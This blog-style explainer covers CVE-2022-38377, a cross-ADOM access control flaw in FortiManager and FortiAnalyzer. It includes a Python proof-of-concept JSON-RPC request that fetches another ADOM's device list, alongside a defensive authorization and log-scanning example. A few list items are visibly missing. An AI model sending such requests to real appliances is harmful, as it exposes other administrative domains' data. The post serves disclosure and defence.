CVE-2022-38377 - Breaking Down the FortiManager and FortiAnalyzer Improper Access Control Vulnerability
When it comes to enterprise security, Fortinet’s FortiManager and FortiAnalyzer are household names. But in late 2022, a critical vulnerability put organizations at risk: CVE-2022-38377. Let’s dive into what happened, how attackers could exploit it, and what you can do if your systems are affected. This post is crafted in plain, actionable language—no complex technical jargon!
What is CVE-2022-38377?
This is an improper access control vulnerability [CWE-284] affecting both FortiManager and FortiAnalyzer:
The Core Problem
If a remote admin user is authenticated for a specific ADOM (Administrative Domain), they can, in some cases, see device and dashboard info belonging to other ADOMs. In simpler words: a user limited to one security area might peek into others—not supposed to happen!
Reference:
- Fortinet Security Advisory (FG-IR-22-249)
Why is this serious?
ADOMs are designed to segregate admin access. A large company might use ADOMs so an admin in Europe cannot see or touch anything in the US network, for example. CVE-2022-38377 tears down those walls. If breached, this vulnerability lets an attacker jump boundaries and snoop on other sections—breaking trust and potentially exposing critical info.
2. Be confined (in theory) to a specific ADOM.
3. Send requests or use the web interface/API in a way that bypasses proper checks, letting them access other ADOMs' data.
Practical Exploit Scenario
Suppose an attacker logs in as jane_admin, who should only see "ADOM-A". Through crafted API calls, jane_admin sends a request asking for device info, but changes the ADOM parameter to "ADOM-B". Due to improper access control, the system honors the request and reveals sensitive information.
Below is a simplified pseudocode example for demonstration:
import requests

# Session cookie issued to the admin after logging in to FortiManager
# (placeholder cookie name and token; the real values come from the login response)
session_cookie = {'APSCOOKIE_123456789ABCDEF': 'session_token_here'}

# Intended ADOM (assigned to the user)
adom = "ADOM-A"

# ADOM the user is NOT assigned to, but asks for anyway
target_adom = "ADOM-B"

url = "https://fortimanager.example.com/jsonrpc"

# JSON-RPC request body: only the ADOM in the url path differs from a legitimate lookup
data = {
    "method": "get",
    "params": [
        {
            "url": f"/dvmdb/adom/{target_adom}/device"
        }
    ],
    "id": 1,
    "session": "session_token_here"
}

# verify=False disables TLS certificate checking; it is here only for the demo host
response = requests.post(url, json=data, cookies=session_cookie, verify=False)
print(response.json())
If the vulnerability exists, this code would return the device list for ADOM-B, even though the user is not supposed to access it.
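As an added example (not Fortinet's code and not part of the original post), here is the server-side check whose absence the flaw comes down to: every ADOM named in a JSON-RPC `url` is compared against the ADOMs the session is actually assigned to, and the same logic is replayed over request log entries to spot cross-ADOM lookups after the fact. The session table, user names, tokens and log entries are constructed for the example.

```python
import re
from dataclasses import dataclass

# Matches the ADOM-scoped JSON-RPC paths shown above, e.g. /dvmdb/adom/ADOM-A/device
ADOM_PATH = re.compile(r"^/dvmdb/adom/(?P<adom>[^/]+)(?:/|$)")


@dataclass(frozen=True)
class Session:
    user: str
    adoms: frozenset  # ADOMs this admin account is assigned to


# Constructed session table standing in for the appliance's own session store.
SESSIONS = {
    "session_token_here": Session("jane_admin", frozenset({"ADOM-A"})),
    "token_for_global_admin": Session("root_admin", frozenset({"ADOM-A", "ADOM-B"})),
}

# Constructed request log: jane_admin's legitimate lookup, the cross-ADOM one from the
# post, and a global admin who is genuinely assigned to ADOM-B.
SAMPLE_LOG = [
    {"method": "get", "params": [{"url": "/dvmdb/adom/ADOM-A/device"}], "session": "session_token_here"},
    {"method": "get", "params": [{"url": "/dvmdb/adom/ADOM-B/device"}], "session": "session_token_here"},
    {"method": "get", "params": [{"url": "/dvmdb/adom/ADOM-B/device"}], "session": "token_for_global_admin"},
]


def adom_from_path(path):
    """Return the ADOM named in an ADOM-scoped path, or None if the path is not ADOM-scoped."""
    m = ADOM_PATH.match(path)
    return m.group("adom") if m else None


def authorize(request, sessions=SESSIONS):
    """Decide whether a JSON-RPC request may proceed: every 'url' must name an ADOM the
    session is assigned to; unknown sessions and non-ADOM paths are denied. Returns (allowed, reason)."""
    session = sessions.get(request.get("session"))
    if session is None:
        return False, "unknown session"
    for param in request.get("params", []):
        adom = adom_from_path(param.get("url", ""))
        if adom is None:
            return False, "request is not scoped to an ADOM"
        if adom not in session.adoms:
            return False, f"{session.user} is not assigned to {adom}"
    return True, "ok"


def cross_adom_lookups(log, sessions=SESSIONS):
    """Scan logged requests for lookups into ADOMs the session was not assigned to; returns (user, adom) pairs."""
    findings = []
    for entry in log:
        session = sessions.get(entry.get("session"))
        if session is None:
            continue
        for param in entry.get("params", []):
            adom = adom_from_path(param.get("url", ""))
            if adom is not None and adom not in session.adoms:
                findings.append((session.user, adom))
    return findings
```

The check keys on the ADOM taken from the request path, not on the ADOM the client claims to be working in, which is the distinction the vulnerable behaviour blurred.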
- Inventory of managed assets
This could allow broader attacks or even social engineering against your organization’s IT teams.
Immediate Steps
- Update to the latest version as recommended by Fortinet’s advisory.
Takeaway
CVE-2022-38377 is a wake-up call: even the best network security tools can have powerful weaknesses. For security teams, always keep systems patched, restrict admin privileges as much as possible, and keep an eye on the official advisories.
References & Further Reading
- Fortinet Security Advisory (FG-IR-22-249)
- CVE-2022-38377 entry at NVD
- Fortinet Download Center
Timeline
Published on: 11/25/2022 16:15:00 UTC
Last modified on: 12/01/2022 13:28:00 UTC